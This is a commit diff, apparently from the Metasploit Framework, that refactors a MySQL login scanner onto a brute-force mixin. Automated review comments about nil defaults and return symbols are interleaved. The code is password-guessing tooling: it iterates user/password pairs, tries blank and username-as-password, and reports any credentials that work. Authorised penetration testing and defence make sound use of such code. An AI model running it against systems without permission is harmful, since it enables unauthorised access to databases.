use the authbrute mixin
git-svn-id: file:///home/svn/framework3/trunk@8150 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
d90ffdc015
commit
08eb80f4a9
|
@ -29,8 +29,8 @@ module Exploit::Remote::MYSQL
|
|||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(3306),
|
||||
OptString.new('MYSQL_USER', [ true, 'The username to authenticate as', 'root']),
|
||||
OptString.new('MYSQL_PASS', [ false, 'The password for the specified username', '']),
|
||||
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
|
||||
], Msf::Exploit::Remote::MYSQL
|
||||
)
|
||||
end
|
||||
|
@ -55,7 +55,7 @@ module Exploit::Remote::MYSQL
|
|||
end
|
||||
|
||||
def mysql_login_datastore
|
||||
mysql_login(datastore['MYSQL_USER'], datastore['MYSQL_PASS'])
|
||||
mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||
end
|
||||
|
||||
def mysql_query(sql)
|
||||
|
|
|
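Review bot: `mysql_login_datastore` now hands `datastore['USERNAME']` and `datastore['PASSWORD']` straight to `mysql_login`, but the new USERNAME option is registered as optional (`false`) with no default, whereas the removed MYSQL_USER option guaranteed `'root'` and MYSQL_PASS guaranteed `''`; both arguments can therefore be nil where they previously could not. Unless `mysql_login` is known to coerce nil itself, either keep a default on the option or guard the call, e.g. `mysql_login(datastore['USERNAME'].to_s, datastore['PASSWORD'].to_s)`. The rename also means any existing module or saved datastore that still sets MYSQL_USER/MYSQL_PASS is silently ignored; a comment on the option list such as `# Renamed from MYSQL_USER/MYSQL_PASS for the AuthBrute mixin; the old names are no longer read` would make that discoverable. `mysql_query` begins on the last line of the second hunk and continues outside it.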
@ -16,9 +16,10 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MYSQL
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::AuthBrute
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -31,56 +32,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MYSQL_PASS_FILE', [ false, 'A dictionary of passwords to perform a bruteforce attempt']),
|
||||
OptBool.new('VERBOSE', [ true, 'Verbose output', false])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
user = datastore['MYSQL_USER'].to_s
|
||||
user = "root" if user.empty?
|
||||
|
||||
if (datastore['MYSQL_PASS_FILE'] and not datastore['MYSQL_PASS_FILE'].empty?)
|
||||
stime = Time.now.to_f
|
||||
cnt = 0
|
||||
|
||||
File.open(datastore['MYSQL_PASS_FILE'], "rb") do |fd|
|
||||
lcnt = 0
|
||||
fd.each_line{lcnt += 1 }
|
||||
fd.seek(0)
|
||||
|
||||
# Always try a blank password (not handled in the file parsing)
|
||||
ret = do_login(user, '', datastore['VERBOSE'])
|
||||
return if ret == :pass
|
||||
return if ret == :error
|
||||
|
||||
fd.each_line do |line|
|
||||
line.strip!
|
||||
next if line =~ /^#/
|
||||
next if line.empty?
|
||||
|
||||
ret = do_login(user, line.strip, datastore['VERBOSE'])
|
||||
break if ret == :pass
|
||||
break if ret == :error
|
||||
|
||||
cnt += 1
|
||||
if(cnt % 1000 == 0)
|
||||
pps = (cnt / (Time.now.to_f - stime)).to_i
|
||||
pct = (cnt/lcnt.to_f * 100.0).to_i
|
||||
eta = ((lcnt - cnt) / pps / 60.0).to_i
|
||||
print_status(
|
||||
"#{rhost}:#{rport} completed #{cnt}/#{lcnt} passwords (#{pct}%) " +
|
||||
"at a rate of #{pps} per second " +
|
||||
"ETA #{eta} minutes"
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
else
|
||||
do_login(user, datastore['MYSQL_PASS'], datastore['VERBOSE'])
|
||||
end
|
||||
each_user_pass { |user, pass|
|
||||
do_login(user, pass, datastore['VERBOSE'])
|
||||
}
|
||||
end
|
||||
|
||||
|
||||
|
@ -92,24 +52,34 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{rhost}:#{rport} successful logged in as '#{user}' with password '#{pass}'")
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
:proto => 'MYSQL',
|
||||
:proto => 'mysql',
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:targ_host => rhost,
|
||||
:targ_port => rport
|
||||
)
|
||||
return :pass
|
||||
return :next_user
|
||||
rescue ::RbMysql::AccessDeniedError
|
||||
print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose
|
||||
return :fail
|
||||
print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose
|
||||
return :fail
|
||||
rescue ::RbMysql::Error => e
|
||||
print_error("#{rhost}:#{rport} failed to login: #{e}")
|
||||
return :error
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Rex::ConnectionError
|
||||
return :error
|
||||
return :done
|
||||
end
|
||||
end
|
||||
|
||||
def next_pass(state)
|
||||
# Always try empty and the username
|
||||
passes = ['', state[:user]]
|
||||
state[:idx] ||= 0
|
||||
pass = passes[state[:idx]]
|
||||
state[:idx] += 1
|
||||
return pass
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
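Review bot: The `rescue ::RbMysql::Error => e` branch of `do_login` still returns `:error` while the same hunk moves every other exit to the AuthBrute vocabulary (`:next_user`, `:fail`, `:done`); if `each_user_pass` only acts on those symbols, a protocol-level error will be treated like an ordinary failed attempt and the loop continues for the remaining pairs even though the server is no longer answering normally. Returning the same value as the `::Rex::ConnectionError` branch — `return :done` in place of `return :error` — keeps the two non-authentication failures consistent; if `:error` is in fact understood by the mixin, a one-line comment saying so would stop the next reader from asking. In `next_pass`, a short comment on the exhaustion case would help, e.g. `# Returns nil once both candidates have been handed out; assumed to signal "no more passwords" to the mixin — confirm`, since that contract is not visible here. `do_login` begins outside this hunk, so the `begin` that these `rescue` clauses belong to is not shown.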